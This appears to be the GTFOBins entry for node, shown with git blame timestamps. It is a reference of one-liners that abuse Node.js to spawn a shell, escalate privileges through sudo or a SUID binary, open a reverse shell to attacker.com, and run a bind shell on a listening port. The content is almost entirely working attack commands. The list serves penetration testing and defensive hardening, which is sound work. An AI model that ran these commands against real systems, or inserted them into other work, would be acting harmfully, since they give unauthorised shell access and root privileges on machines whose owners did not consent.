GTFOBins.github.io/_gtfobins/node.md

34 lines
1.2 KiB
Markdown
Raw Normal View History

2018-05-23 20:47:50 +02:00
---
functions:
2018-05-23 21:17:43 +02:00
exec-interactive:
- code: |
2018-05-24 00:37:13 +02:00
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
2018-05-23 21:17:43 +02:00
sudo-enabled:
- code: |
2018-05-24 00:37:13 +02:00
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
2018-05-23 21:17:43 +02:00
suid-enabled:
- code: |
2018-05-24 00:37:13 +02:00
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
2018-05-23 20:47:50 +02:00
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
2018-05-23 20:47:50 +02:00
code: |
2018-05-24 21:59:21 +02:00
export RHOST=attacker.com
2018-05-23 20:47:50 +02:00
export RPORT=12345
2018-05-24 00:37:13 +02:00
node -e 'sh = require("child_process").spawn("/bin/sh");
2018-05-24 00:40:03 +02:00
net.connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
2018-05-23 20:47:50 +02:00
});'
2018-05-24 00:45:47 +02:00
bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
2018-05-24 00:45:47 +02:00
code: |
export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT);'
2018-05-24 00:40:03 +02:00
---